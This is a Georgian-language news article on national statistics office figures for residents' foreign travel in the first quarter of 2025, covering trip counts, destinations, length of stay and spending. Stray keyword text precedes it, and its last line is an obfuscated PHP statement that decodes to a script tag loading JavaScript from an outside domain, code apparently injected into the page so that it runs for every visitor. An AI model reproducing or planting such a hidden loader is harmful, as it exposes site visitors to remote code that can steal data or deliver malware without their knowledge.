gorgia
ავერსი jaluzi

სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2025 წლის პირველ კვარტალში საქართველოს ტერიტორიიდან დაფიქსირდა საქართველოს რეზიდენტი მოგზაურების 614.7 ათასი გასვლა საზღვარგარეთ, რაც 4.4 პროცენტით ნაკლებია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. გასვლების უდიდესი ნაწილი, 44.1 პროცენტი, განხორციელდა 31-50 წლის მოგზაურების მიერ.

საქსტატის ცნობით, აღნიშნული რაოდენობიდან საქართველოს რეზიდენტი ვიზიტორების მიერ საზღვარგარეთ განხორციელებულმა ვიზიტებმა 482.1 ათასი შეადგინა, რაც 7.6 პროცენტით ნაკლებია 2024 წლის ანალოგიური პერიოდის მაჩვენებელზე.

უწყების ანგარიშით, საქართველოს რეზიდენტი ვიზიტორების მიერ საზღვარგარეთ განხორციელდა 323.1 ათასი ტურისტული ტიპის ვიზიტი, რაც 1.7 პროცენტით ნაკლებია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ვიზიტების უმრავლესობა, 47.1 პროცენტი, განხორციელდა საქართველოს რეზიდენტი 31-50 წლის ვიზიტორების მიერ, ქალების მიერ განხორციელებული ვიზიტების რაოდენობამ კი მთლიანი ვიზიტების რაოდენობის 44.9 პროცენტი შეადგინა.

ამასთან, საქსტატის ინფორმაციით, 2025 წლის პირველ კვარტალში ვიზიტების ყველაზე დიდი ნაწილი, 36.6 პროცენტი, განხორციელდა მეგობრების/ნათესავების მონახულების მიზნით. ხოლო ვიზიტების უმრავლესობა განხორციელდა თურქეთსა და სომხეთში, შესაბამისად, 184.9 ათასი და 70.2 ათასი ვიზიტი.

2025 წლის პირველ კვარტალში განხორციელებული ვიზიტებისას გათეული ღამეების საშუალო რაოდენობამ 6.7 ღამე შეადგინა, რაც 2024 წლის პირველ კვარტალში დაფიქსირებულ მაჩვენებელზე (6.4 ღამე) 4.0 პროცენტით მეტია. ვიზიტების 98.6 პროცენტი წარმოადგენდა განმეორებითი ხასიათის ვიზიტს.

საანგარიშო პერიოდში განხორციელებული ვიზიტებისას გაწეული ხარჯები 481.5 მილიონ ლარს გაუტოლდა, რაც 5.7 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ვიზიტზე საშუალო ხარჯი 2024 წლის პირველ კვარტალთან შედარებით 14.4 პროცენტით გაიზარდა და 998.8 ლარი შეადგინა.

125
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");